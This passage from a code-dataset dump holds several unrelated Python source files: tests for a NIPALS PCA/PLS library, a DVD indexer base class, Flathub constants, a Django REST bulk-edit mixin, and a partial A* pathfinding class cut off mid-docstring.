id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1783442 | <filename>tests/test_nipals.py
import logging
import matplotlib
import numpy as np
import pandas as pd
import pytest
from nipals import nipals
# Small 7x5 example matrix with missing values (np.nan) in the first column,
# used to exercise NIPALS' missing-data handling.
testdata = [
    [np.nan, 67, 90, 98, 120],
    [np.nan, 71, 93, 102, 129],
    [65, 76, 95, 105, 134],
    [50, 80, 102, 130, 138],
    [60, 82, 97, 135, 151],
    [65, 89, 106, 137, 153],
    [75, 95, 117, 133, 155]
]
# Same matrix with the missing values filled in (complete-data reference).
testdata_full = [
    [50, 67, 90, 98, 120],
    [55, 71, 93, 102, 129],
    [65, 76, 95, 105, 134],
    [50, 80, 102, 130, 138],
    [60, 82, 97, 135, 151],
    [65, 89, 106, 137, 153],
    [75, 95, 117, 133, 155]
]
# Variant of testdata with two binary class columns (C1/C2) appended to the
# row index, used by the class-aware plotting and CV tests.
testdata_class = pd.DataFrame(testdata)
testdata_class['C1'] = [0, 0, 1, 1, 1, 0, 0]
testdata_class['C2'] = [1, 1, 0, 0, 0, 1, 1]
testdata_class = testdata_class.set_index(['C1', 'C2'], append=True)
# Reference datasets plus expected scores/loadings/weights loaded from CSV
# fixtures (the comments below suggest they were produced with the R nipals
# package — values are treated as ground truth here).
yarn = pd.read_csv("tests/yarn.csv", index_col=0)
yarn_scores = pd.read_csv("tests/yarn_scores.csv", index_col=0).values
yarn_loadings = pd.read_csv("tests/yarn_loadings.csv", index_col=0).values
yarn_weights = pd.read_csv("tests/yarn_weights.csv", index_col=0).values
yarn_missing_scores = pd.read_csv("tests/yarn_missing_scores.csv", index_col=0, usecols=[0, 2, 3, 4]).values
yarn_missing_loadings = pd.read_csv("tests/yarn_missing_loadings.csv", index_col=0).values
yarn_missing_weights = pd.read_csv("tests/yarn_missing_weights.csv", index_col=0).values
oliveoil = pd.read_csv("tests/oliveoil.csv", index_col=0)
oliveoil_scores = pd.read_csv("tests/oliveoil_scores.csv", index_col=0)
oliveoil_missing_y = pd.read_csv("tests/oliveoil_miss.csv", index_col=0)
oliveoil_missing_y_scores = pd.read_csv("tests/oliveoil_miss_scores.csv", index_col=0)
# Set matplotlib backend to allow for headless testing
matplotlib.use('Agg')
def test_init_from_df():
    # It should be possible to init a nipals class from a Pandas DataFrame
    assert nipals.Nipals(pd.DataFrame(testdata)).__class__ == nipals.Nipals


def test_init_from_data():
    # It should be possible to init a nipals class from something that
    # can be made into a Pandas DataFrame
    assert nipals.Nipals(testdata).__class__ == nipals.Nipals


def test_run_pca():
    # Fit the missing-data matrix twice: once with an explicit start column,
    # once with the default; eigenvalues are compared against reference data.
    nip = nipals.Nipals(testdata)
    # Set startcol to get same results as R nipals:nipals (rounding errors give slightly different rotation otherwise)
    assert nip.fit(startcol=1)
    np.testing.assert_almost_equal(list(nip.eig), [
        4.876206673116805,
        2.044242214135278,
        1.072810327696312,
        0.23701331933712338,
        0.14325051166784325
    ])
    # Also run without startcol set to make sure that it works as well. But compare to self data
    assert nip.fit()
    np.testing.assert_almost_equal(list(nip.eig), [
        4.876216689582536,
        2.044275687396918,
        1.072805497059184,
        0.23696073749622645,
        0.14327789003413574
    ])


def test_call_with_too_large_ncomp(caplog):
    # Asking for more components than the data supports should warn and clamp.
    nip = nipals.Nipals(testdata)
    assert nip.fit(ncomp=10)
    assert caplog.record_tuples == [
        (
            'root',
            logging.WARNING,
            'ncomp is larger than the max dimension of the x matrix.\n'
            'fit will only return 5 components'
        ),
    ]


def test_run_pca_without_na():
    # PCA on the complete (no-NaN) matrix.
    nip = nipals.Nipals(testdata_full)
    assert nip.fit()
    np.testing.assert_almost_equal(list(nip.eig), [
        5.020518433605382,
        1.879323465996815,
        1.1081766447275905,
        0.17225187199265019,
        0.06936702860594454
    ])


def test_fail_from_maxiter():
    # A single iteration is not enough to converge -> RuntimeError expected.
    nip = nipals.Nipals(testdata_full)
    with pytest.raises(RuntimeError):
        nip.fit(maxiter=1)


def test_run_pca_with_set_ncomp():
    # Limiting ncomp should return just the first two eigenvalues.
    nip = nipals.Nipals(testdata_full)
    assert nip.fit(ncomp=2)
    np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])


def test_run_pca_with_precentered_data():
    # Pre-centering the data and fitting with center=False must reproduce the
    # eigenvalues of the auto-centered fit.
    centered = pd.DataFrame(testdata_full)
    centered = centered - centered.mean()
    nip = nipals.Nipals(centered)
    assert nip.fit(center=False, ncomp=2)
    np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])


def test_run_pca_with_prescaled_data():
    # Same idea for manually standardized data with center=False/scale=False.
    scaled = pd.DataFrame(testdata_full)
    scaled = (scaled - scaled.mean()) / scaled.std(ddof=1)
    nip = nipals.Nipals(scaled)
    assert nip.fit(center=False, scale=False, ncomp=2)
    np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])


def test_run_pca_check_scores_with_sweep():
    # Scores when eigsweep=True (rescaled scores); compared at 3 decimals.
    nip = nipals.Nipals(testdata)
    assert nip.fit(ncomp=2, eigsweep=True, startcol=1)
    np.testing.assert_almost_equal(nip.scores.values, [
        [-0.5585132, 0.1224190],
        [-0.3801627, 0.1703718],
        [-0.2026926, 0.3163937],
        [-0.0337608, -0.6915786],
        [0.1285239, -0.4501362],
        [0.3562110, -0.2048250],
        [0.5982563, 0.3647261],
    ], 3)


def test_run_pca_check_scores():
    # Unswept scores for the default 2-component fit.
    nip = nipals.Nipals(testdata)
    assert nip.fit(ncomp=2)
    np.testing.assert_almost_equal(nip.scores.values, [
        [-2.72332498, 0.25021637],
        [-1.85369271, 0.34827344],
        [-0.98854112, 0.64658032],
        [-0.16429534, -1.41375825],
        [0.62686116, -0.92008715],
        [1.7370958, -0.41837244],
        [2.91721621, 0.746181]
    ])
def test_predict_from_pca():
    # Project two new observations onto a fitted 2-component model.
    nip = nipals.Nipals(testdata)
    nip.fit(ncomp=2)
    assert nip.predict(pd.DataFrame([
        [63, 70, 98, 110, 124],
        [51, 82, 102, 110, 108]
    ]))
    np.testing.assert_almost_equal(
        nip.pred.values,
        [
            [-1.4465766, 0.4500705],
            [-1.6229739, -0.340578]
        ]
    )


def test_predict_from_pca_precentered():
    # When the model was fit on manually centered data (center=False), new
    # observations must be centered with the *training* means before predict.
    centered = pd.DataFrame(testdata_full)
    origmean = centered.mean()
    centered = centered - origmean
    nip = nipals.Nipals(centered)
    assert nip.fit(center=False, ncomp=2)
    # assert nip.fit(center=True, ncomp=2)
    np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])
    predtest = pd.DataFrame([
        [63, 70, 98, 110, 124],
        [51, 82, 102, 110, 108]
    ])
    predtest = predtest - origmean
    assert nip.predict(predtest)
    np.testing.assert_almost_equal(
        nip.pred.values,
        [
            [-1.2749312, 0.7863909],
            [-1.5595433, 0.0705577]
        ]
    )


def test_predict_from_pca_prescaled():
    # Same for manually scaled data (scale=False); compared at 3 decimals.
    scaled = pd.DataFrame(testdata_full)
    origstd = scaled.std(ddof=1)
    scaled = scaled / origstd
    nip = nipals.Nipals(scaled)
    assert nip.fit(scale=False, ncomp=2)
    # assert nip.fit(center=True, ncomp=2)
    np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])
    predtest = pd.DataFrame([
        [63, 70, 98, 110, 124],
        [51, 82, 102, 110, 108]
    ])
    predtest = predtest / origstd
    assert nip.predict(predtest)
    np.testing.assert_almost_equal(
        nip.pred.values,
        [
            [-1.2749312, 0.7863909],
            [-1.5595433, 0.0705577]
        ],
        3
    )


def test_predict_from_pca_with_sweep():
    # Predictions when the model was fit with eigsweep=True.
    nip = nipals.Nipals(testdata)
    nip.fit(ncomp=2, eigsweep=True)
    assert nip.predict(pd.DataFrame([
        [63, 70, 98, 110, 124],
        [51, 82, 102, 110, 108]
    ]))
    np.testing.assert_almost_equal(
        nip.pred.values,
        [
            [-0.2966596, 0.2201614],
            [-0.3328347, -0.1666008]
        ]
    )


def test_pca_zerovar():
    # A constant column must raise ValueError unless dropzerovar=True.
    tmpx = pd.DataFrame(testdata)
    tmpx.loc[:, 'extra'] = 2.0
    pca = nipals.Nipals(tmpx)
    with pytest.raises(ValueError) as e_info:
        pca.fit(2)
    assert e_info.match("zero variance in column.*extra")
    assert pca.fit(2, dropzerovar=True)
def test_plot():
    # Score plot of a fitted model returns a matplotlib Figure (Agg backend).
    nip = nipals.Nipals(testdata)
    nip.fit(ncomp=2)
    plt = nip.plot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_plot_classes():
    # Plot grouped by the class levels stored in the DataFrame index.
    nip = nipals.Nipals(testdata_class)
    nip.fit(ncomp=2)
    plt = nip.plot(classlevels=['C1', 'C2'])
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_plot_classoptions():
    # Custom per-class markers and colors.
    nip = nipals.Nipals(testdata_class)
    nip.fit(ncomp=2)
    plt = nip.plot(classlevels=['C1', 'C2'], markers=['s', 'o'], classcolors=['red', 'black'])
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_pred_plot():
    # Overlay predicted observations on the score plot (plotpred=True).
    nip = nipals.Nipals(testdata_class)
    nip.fit(ncomp=2)
    nip.predict(pd.DataFrame([
        [63, 70, 98, 110, 124],
        [51, 82, 102, 110, 108]
    ]))
    plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True)
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_plot_labels():
    # Label training points via an index level and predictions via column 0.
    nip = nipals.Nipals(testdata_class)
    nip.fit(ncomp=2)
    nip.predict(pd.DataFrame([
        [63, 70, 98, 110, 124],
        [51, 82, 102, 110, 108]
    ], index=['a', 'b']))
    plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, labels='C1', predlabels=0)
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_pred_plot_labels():
    # Prediction data carrying its own class levels (index levels 5 and 6).
    nip = nipals.Nipals(testdata_class)
    nip.fit(ncomp=2)
    nip.predict(pd.DataFrame([
        [63, 70, 98, 110, 124, 0, 1, 0],
        [51, 82, 102, 110, 108, 1, 0, 0]
    ], index=['a', 'b']).set_index([5, 6, 7], append=True))
    plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, labels='C1', predlevels=[5, 6], predlabels=0)
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_pred_plot_options():
    # predlevels=[5, 7] is expected to raise KeyError; [5, 6] plots fine.
    nip = nipals.Nipals(testdata_class)
    nip.fit(ncomp=2)
    nip.predict(pd.DataFrame([
        [63, 70, 98, 110, 124, 0, 1, 0],
        [51, 82, 102, 110, 108, 1, 0, 0]
    ]).set_index([5, 6, 7], append=True))
    with pytest.raises(KeyError):
        plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, predlevels=[5, 7])
    plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, predlevels=[5, 6])
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_loadings_plot():
    # Loadings plot returns a matplotlib Figure.
    nip = nipals.Nipals(testdata_class)
    nip.fit(ncomp=2)
    plt = nip.loadingsplot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt
def test_pls():
    # PLS on the yarn NIR data (268 X columns, 1 Y column); scores, loadings
    # and weights are compared against reference CSV fixtures.
    pls = nipals.PLS(yarn.iloc[:, :268], yarn.iloc[:, 268])
    assert pls.fit(ncomp=6, scale=False)
    np.testing.assert_almost_equal(pls.scores.values, yarn_scores)
    np.testing.assert_almost_equal(pls.loadings.values, yarn_loadings)
    np.testing.assert_almost_equal(pls.weights.values, yarn_weights)


def test_pls_nocenter_and_scale():
    # Pre-centering X and fitting with center=False must give identical results.
    pls = nipals.PLS(yarn.iloc[:, :268] - yarn.iloc[:, :268].mean(), yarn.iloc[:, 268])
    assert pls.fit(ncomp=6, scale=False, center=False)
    np.testing.assert_almost_equal(pls.scores.values, yarn_scores)
    np.testing.assert_almost_equal(pls.loadings.values, yarn_loadings)
    np.testing.assert_almost_equal(pls.weights.values, yarn_weights)
def test_pls_missing_x():
    """PLS with scattered NaNs injected into the X block."""
    # Take an explicit copy: `yarn.iloc[:, :268]` is a view/slice of the
    # shared module-level DataFrame, and assigning NaNs into it would both
    # trigger pandas' chained-assignment warning and contaminate `yarn`
    # for every other test in this module.
    tmpx = yarn.iloc[:, :268].copy()
    csel = [171, 107, 222, 150, 76, 205, 63, 19, 121, 183]
    rsel = [23, 0, 3, 22, 15, 21, 19, 7, 19, 5]
    for r, c in zip(rsel, csel):
        tmpx.iloc[r, c] = np.nan
    pls = nipals.PLS(tmpx, yarn.iloc[:, 268])
    assert pls.fit(ncomp=3)
    np.testing.assert_almost_equal(pls.scores.values, yarn_missing_scores, 5)
    np.testing.assert_almost_equal(pls.loadings.values, yarn_missing_loadings)
    np.testing.assert_almost_equal(pls.weights.values, yarn_missing_weights)
def test_pls_nondf():
    # Plain numpy arrays (not DataFrames) should be accepted as input.
    pls = nipals.PLS(yarn.iloc[:, :268].values, yarn.iloc[:, 268].values)
    assert pls.fit(ncomp=6, scale=False)
    np.testing.assert_almost_equal(pls.scores.values, yarn_scores)
    np.testing.assert_almost_equal(pls.loadings.values, yarn_loadings)
    np.testing.assert_almost_equal(pls.weights.values, yarn_weights)


def test_pls_optionvariations(caplog):
    # Default fit, oversized ncomp (warns and clamps to 28), maxiter failure.
    pls = nipals.PLS(yarn.iloc[:, :268], yarn.iloc[:, 268])
    assert pls.fit()
    assert pls.fit(ncomp=500, startcol=0)
    assert caplog.record_tuples == [
        (
            'root',
            logging.WARNING,
            'ncomp is larger than the max dimension of the x matrix.\n'
            'fit will only return 28 components'
        ),
    ]
    with pytest.raises(RuntimeError):
        pls.fit(maxiter=1)


def test_pls_multiy():
    # Multiple Y columns; the `* [-1, 1]` flips the first component's sign
    # to match the reference scores' rotation.
    pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    np.testing.assert_almost_equal(pls.scores.values, oliveoil_scores * [-1, 1], 4)


def test_pls_missing_y():
    # PLS with missing values in the Y block.
    pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    np.testing.assert_almost_equal(pls.scores.values, oliveoil_missing_y_scores * [-1, 1], 3)


def test_pls_zerovar_x():
    # Constant X column must raise unless dropzerovar=True.
    tmpx = oliveoil.iloc[:, :5].copy()
    tmpx.loc[:, 'extra'] = 2.0
    pls = nipals.PLS(tmpx, oliveoil.iloc[:, 5:])
    with pytest.raises(ValueError) as e_info:
        pls.fit(2)
    assert e_info.match("zero variance in column.*extra")
    assert pls.fit(2, dropzerovar=True)


def test_pls_zerovar_y():
    # Constant Y column must raise unless dropzerovar=True.
    tmpy = oliveoil.iloc[:, 5:].copy()
    tmpy.loc[:, 'extra'] = 2.0
    pls = nipals.PLS(oliveoil.iloc[:, :5], tmpy)
    with pytest.raises(ValueError) as e_info:
        pls.fit(2)
    assert e_info.match("zero variance in column.*extra")
    assert pls.fit(2, dropzerovar=True)


def test_pls_score_plot():
    pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.plot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_pls_load_plot():
    pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.loadingsplot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_pls_load_plot_no_y():
    # Loadings plot with the weight overlay disabled.
    pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.loadingsplot(showweights=False)
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_pls_load_plot_without_labels():
    pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.loadingsplot(labels=False)
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_pls_load_plot_with_markers():
    # Custom marker symbols for the weight points.
    pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.loadingsplot(weightmarkers=['s', 'o', 'v', '^', '+', '3'])
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_inf_values_in_dfs(caplog):
    # Infinite values are converted to NaN with a warning: one message for
    # PCA input, and one each for the PLS X and Y blocks.
    olive_inf = oliveoil.replace([18.7, 75.1], np.inf)
    nipals.Nipals(olive_inf)
    nipals.PLS(olive_inf.iloc[:, :5], olive_inf.iloc[:, 5:])
    assert caplog.record_tuples == [
        (
            'root',
            logging.WARNING,
            'Data contained infinite values, converting to missing values'
        ),
        (
            'root',
            logging.WARNING,
            'X data contained infinite values, converting to missing values'
        ),
        (
            'root',
            logging.WARNING,
            'Y data contained infinite values, converting to missing values'
        ),
    ]
def test_cv_pca():
    # Cross-validated PCA with default CV (cv=True) and explicit 4-fold CV;
    # the R2/Q2 assertions refer to the last (4-fold) fit.
    nip = nipals.Nipals(testdata_class)
    assert nip.fit(ncomp=2, cv=True)
    assert nip.fit(ncomp=2, cv=4)
    np.testing.assert_almost_equal(
        nip.R2,
        [0.8112004, 0.144992]
    )
    np.testing.assert_almost_equal(
        nip.Q2,
        [0.577648, 0.1909286]
    )


def test_cv_pca_with_fliped_axis():
    """Checks that the Q2 is approx the same when some cvs have flipped axis in some PC"""
    nip = nipals.Nipals(testdata_class)
    assert nip.fit(ncomp=2, cv=True, startcol=2)
    Q2_sc2 = nip.Q2.values
    assert nip.fit(ncomp=2, cv=True)
    np.testing.assert_almost_equal(
        nip.Q2,
        Q2_sc2,
        3
    )


def test_cv_pls():
    # Cross-validated PLS: Q2 plus per-component R2 for the X and Y blocks.
    pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
    assert pls.fit(ncomp=2, cv=True)
    assert pls.fit(ncomp=2, cv=4)
    np.testing.assert_almost_equal(
        pls.Q2,
        [0.2684853, 0.0644187]
    )
    np.testing.assert_almost_equal(
        pls.R2X,
        [0.5826444, 0.2367458]
    )
    np.testing.assert_almost_equal(
        pls.R2Y,
        [0.4326835, 0.0856207]
    )


def test_dmodx_pca():
    # Distance-to-model (DModX) values, one per observation.
    nip = nipals.Nipals(testdata_class)
    assert nip.fit(ncomp=2)
    np.testing.assert_almost_equal(
        nip.dModX(),
        [
            0.5364634, 0.3480396, 0.5702191,
            1.5525099, 1.5752593, 0.3275259,
            1.1255771
        ]
    )


def test_dmodx_plot_pca():
    nip = nipals.Nipals(testdata_class)
    assert nip.fit(ncomp=2)
    plt = nip.dModXPlot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_overviewplotplot_pca():
    # Combined overview figure for a PCA model.
    nip = nipals.Nipals(testdata_class)
    assert nip.fit(ncomp=2)
    plt = nip.overviewplot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_dmod_pls():
    # DModX and DModY for a fitted PLS model.
    pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    np.testing.assert_almost_equal(
        pls.dModX(),
        [
            0.8561775, 0.6808639, 1.2475466, 1.9522224,
            0.1694258, 0.6151471, 0.8651022, 1.1295028,
            1.2212977, 1.2945167, 0.8681262, 1.141947,
            0.7637504, 0.3900809, 0.7382779, 0.7063927
        ]
    )
    np.testing.assert_almost_equal(
        pls.dModY(),
        [
            0.5728738, 2.0598601, 1.2420525, 0.5257193, 1.4290988, 0.7752674,
            1.0029673, 0.8943648, 1.0509669, 0.8511583, 0.7153933, 1.0285289,
            0.8238886, 0.4616424, 0.5664762, 0.7409856
        ]
    )


def test_dmodx_plot_pls():
    pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.dModXPlot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_dmody_plot_pls():
    pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.dModYPlot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt


def test_overviewplotplot_pls():
    # Combined overview figure for a PLS model.
    pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
    assert pls.fit(ncomp=2)
    plt = pls.overviewplot()
    assert isinstance(plt, matplotlib.figure.Figure)
    return plt
| StarcoderdataPython |
198635 | <reponame>po5/vs-parsedvd
import shutil
import subprocess
import vapoursynth as vs
from pathlib import Path
from abc import ABC, abstractmethod
from typing import Any, Callable, List, Union, Tuple
from ..dataclasses import IndexFileType
core = vs.core
class DVDIndexer(ABC):
    """Abstract DVD indexer interface.

    Wraps an external indexing executable together with the VapourSynth
    source/indexer function that consumes the index files it produces.
    """

    def __init__(
        self, path: Union[Path, str], vps_indexer: Callable[..., vs.VideoNode],
        ext: str, force: bool = True, **indexer_kwargs: Any
    ) -> None:
        self.path = Path(path)  # location of the external indexer executable
        self.vps_indexer = vps_indexer  # VapourSynth function that loads the index
        self.ext = ext  # file extension of the generated index files
        self.force = force  # if True, delete corrupted index files instead of raising
        self.indexer_kwargs = indexer_kwargs  # extra kwargs forwarded to vps_indexer
        super().__init__()

    @abstractmethod
    def get_cmd(self, files: List[Path], output: Path) -> List[str]:
        """Returns the indexer command"""
        raise NotImplementedError

    @abstractmethod
    def get_info(self, index_path: Path, file_idx: int = 0) -> IndexFileType:
        """Returns info about the indexing file"""
        raise NotImplementedError

    @abstractmethod
    def update_idx_file(self, index_path: Path, filepaths: List[Path]) -> None:
        """Rewrite an existing index file so it references the given file paths."""
        raise NotImplementedError

    def _check_path(self) -> Path:
        # Verify the indexer executable is resolvable (on PATH or absolute).
        if not shutil.which(str(self.path)):
            raise FileNotFoundError(f'DVDIndexer: `{self.path}` was not found!')
        return self.path

    def index(self, files: List[Path], output: Path) -> None:
        """Run the external indexer synchronously on *files*.

        Raises subprocess.CalledProcessError on a non-zero exit (check=True).
        The working directory is the directory of the first input file.
        """
        subprocess.run(
            list(map(str, self.get_cmd(files, output))),
            check=True, text=True, encoding='utf-8',
            stdout=subprocess.PIPE, cwd=files[0].parent
        )

    def get_idx_file_path(self, path: Path) -> Path:
        # Index file lives next to the source file, same stem, indexer extension.
        return path.with_suffix(self.ext)

    def file_corrupted(self, index_path: Path) -> None:
        """Handle a corrupted index file: delete it when force=True, else raise."""
        if self.force:
            try:
                index_path.unlink()
            except OSError:
                raise RuntimeError("IsoFile: Index file corrupted, tried to delete it and failed.")
        else:
            raise RuntimeError("IsoFile: Index file corrupted! Delete it and retry.")

    @staticmethod
    def _split_lines(buff: List[str]) -> Tuple[List[str], List[str]]:
        # Split a list of lines at the first empty string (the separator line
        # itself is dropped). Raises ValueError if no empty line is present.
        split_idx = buff.index('')
        return buff[:split_idx], buff[split_idx + 1:]
| StarcoderdataPython |
1620000 | <filename>fpakman/core/flatpak/constants.py
from fpakman.core.constants import CACHE_PATH
# Base URL of the Flathub website and the v1 REST API derived from it.
FLATHUB_URL = 'https://flathub.org'
FLATHUB_API_URL = FLATHUB_URL + '/api/v1'
# On-disk cache directory for data about installed Flatpak applications.
FLATPAK_CACHE_PATH = '{}/flatpak/installed'.format(CACHE_PATH)
| StarcoderdataPython |
1646494 | <filename>drf_tweaks/mixins.py
from collections import deque
from rest_framework.exceptions import NotFound, ValidationError
class BulkEditAPIMixin(object):
    """Mixin adding bulk create/update/delete through PUT with a list payload.

    Each payload item is routed by its identifier key:

    * ``id``      -> update an existing object, or delete it when the item
                     carries a truthy ``delete_object`` and deletes are
                     allowed (``BULK_EDIT_ALLOW_DELETE_ITEMS``);
    * ``temp_id`` -> create a new object (only when the view also provides
                     ``create``). The client-chosen ``temp_id`` lets the
                     frontend match validation errors back to its items.

    All items are validated first; changes are only applied when every item
    passed validation.
    """

    # Serializer class used for (partial) updates of individual objects.
    details_serializer_class = None
    # how many items can be edited at once, disabled if None
    BULK_EDIT_MAX_ITEMS = None
    # whether items may be deleted via {"id": ..., "delete_object": true}
    BULK_EDIT_ALLOW_DELETE_ITEMS = False

    def _get_item_id_key(self, item):
        """Items use id for update and delete and temp_id for create"""
        for key in ["id", "temp_id"]:
            if key in item:
                return key
        return None

    def _get_bulk_edit_items(self, data):
        """Bucket payload items into create/update/delete dicts keyed by id."""
        items = {"create": {}, "update": {}, "delete": {}}
        for request_item in data:
            # to create, FE must pass "temp_id" so they will be able to match
            # the response in case of any validation errors
            id_key = self._get_item_id_key(request_item)
            item_id = request_item.get(id_key)
            if not isinstance(item_id, int):
                continue
            if self.BULK_EDIT_ALLOW_DELETE_ITEMS and request_item.get("delete_object"):
                change_type = "delete"
            elif id_key == "id":
                change_type = "update"
            elif hasattr(self, "create") and id_key == "temp_id":
                change_type = "create"
            else:
                # BUGFIX: previously `change_type` silently kept its value
                # from the preceding iteration (or raised NameError on the
                # first item) when no branch matched — e.g. a temp_id item on
                # a view without `create`. Skip such items instead.
                continue
            items[change_type][item_id] = request_item
        return items

    def _perform_bulk_edit(self, items):
        """Validate every item, then execute all changes.

        Raises NotFound when any referenced id does not exist, and
        ValidationError with the collected per-item serializer errors. No
        action runs unless all items validated successfully.
        """
        update_delete_ids = set(items["update"].keys()) | set(items["delete"].keys())
        update_delete_objects = {item.id: item for item in self.get_queryset().filter(id__in=update_delete_ids)}
        update_delete_objects_ids = set(update_delete_objects.keys())
        if update_delete_ids != update_delete_objects_ids:
            not_found_ids = update_delete_ids - update_delete_objects_ids
            raise NotFound(
                [{"id": item_id, "non_field_errors": ["This item does not exist."]} for item_id in not_found_ids]
            )
        errors = []
        actions = deque()
        for change_type in items:
            for item_id, item in items[change_type].items():
                if change_type == "create":
                    instance = None
                    serializer = self.get_serializer(data=item)
                    action = serializer.save
                elif change_type in ["update", "delete"]:
                    instance = update_delete_objects[item_id]
                    # Deletes are still validated (partial) so that a
                    # malformed item is reported rather than silently applied.
                    serializer = self.get_details_serializer(instance=instance, data=item, partial=True)
                    action = {"update": serializer.save, "delete": instance.delete}[change_type]
                id_key = self._get_item_id_key(item)
                if serializer and not serializer.is_valid():
                    item_error = {id_key: item_id}
                    item_error.update(serializer.errors)
                    errors.append(item_error)
                    continue
                # success - change can be made
                actions.append(action)
        if errors:
            raise ValidationError(errors)
        # perform actions only once validation passed for every item
        for action in actions:
            action()

    def get_details_serializer_class(self):
        """Return the serializer class used for single-object updates."""
        assert self.details_serializer_class is not None, (
            f"{self.__class__.__name__} should either include a `details_serializer_class` attribute, "
            "or override the `get_details_serializer_class()` method."
        )
        return self.details_serializer_class

    def get_details_serializer(self, *args, **kwargs):
        """Get instance of details serializer for bulk edit"""
        serializer_class = self.get_details_serializer_class()
        kwargs["context"] = self.get_serializer_context()
        return serializer_class(*args, **kwargs)

    def put(self, request, *args, **kwargs):
        """Bulk-edit endpoint: apply the list payload, then return the list view."""
        if not isinstance(request.data, list):
            raise ValidationError({"non_field_errors": ["Payload for bulk edit must be a list of objects to edit."]})
        if self.BULK_EDIT_MAX_ITEMS and len(request.data) > self.BULK_EDIT_MAX_ITEMS:
            raise ValidationError(
                {"non_field_errors": [f"Cannot edit more than {self.BULK_EDIT_MAX_ITEMS} items at once."]}
            )
        items = self._get_bulk_edit_items(request.data)
        self._perform_bulk_edit(items)
        return self.list(request, *args, **kwargs)
| StarcoderdataPython |
class Node:
    """
    A node class used in A* Pathfinding.
    parent: it is parent of current node
    position: it is current position of node in the maze.
    g: cost from start to current Node
    h: heuristic based estimated cost for current Node to end Node
    f: total cost of present node i.e. : f = g + h
    """

    def __init__(self, parent=None, position=None):
        # Fix: the parameter was previously misspelled "poistion". Every call
        # site in this module passes it positionally, so the rename is
        # backward compatible.
        self.parent = parent
        self.position = position
        self.g = 0
        self.f = 0
        self.h = 0

    def __eq__(self, other):
        # Two nodes are considered equal when they occupy the same cell,
        # regardless of cost or parent.
        return self.position == other.position
class FindPath():
    """A* search over a 2D grid maze (0 = walkable, non-zero = wall).

    Fix: this module never imports numpy, yet the original code called
    ``np.shape`` (NameError at runtime). Grid dimensions are now derived
    with ``len()`` so the module is dependency-free.
    """

    def __init__(self, maze, cost, start, end):
        self.maze = maze    # 2D list of ints; 0 means walkable
        self.cost = cost    # uniform cost of one move
        self.start = start  # [row, col] of the start cell
        self.end = end      # [row, col] of the goal cell
        # The eight allowed moves: 4 orthogonal + 4 diagonal.
        self.move = [[-1, 0],   # go up
                     [0, -1],   # go left
                     [1, 0],    # go down
                     [0, 1],    # go right
                     [-1, -1],  # go left-up
                     [-1, 1],   # go left down
                     [1, -1],   # go right down
                     [1, 1]]    # go right up

    def return_path(self, curr_node, cost_matrix):
        """Walk the parent links back from curr_node and render step numbers
        into a matrix the same shape as cost_matrix (-1 = not on the path)."""
        no_rows = len(cost_matrix)
        no_columns = len(cost_matrix[0])
        # here we create the initialized result maze with -1 in every position
        res = [[-1 for i in range(no_columns)] for j in range(no_rows)]
        # we will iterate over all parents of node and store in path
        path = []
        curr = curr_node
        while curr is not None:
            path.append(curr.position)
            curr = curr.parent
        path = path[::-1]  # reverse so the path runs start -> goal
        initial_value = 0
        # we will insert the path in matrix
        for i in range(len(path)):
            res[path[i][0]][path[i][1]] = initial_value
            initial_value += 1
        return res

    def search(self):
        """
        Returns a list of tuples as a path from the given start to the given end in the given maze
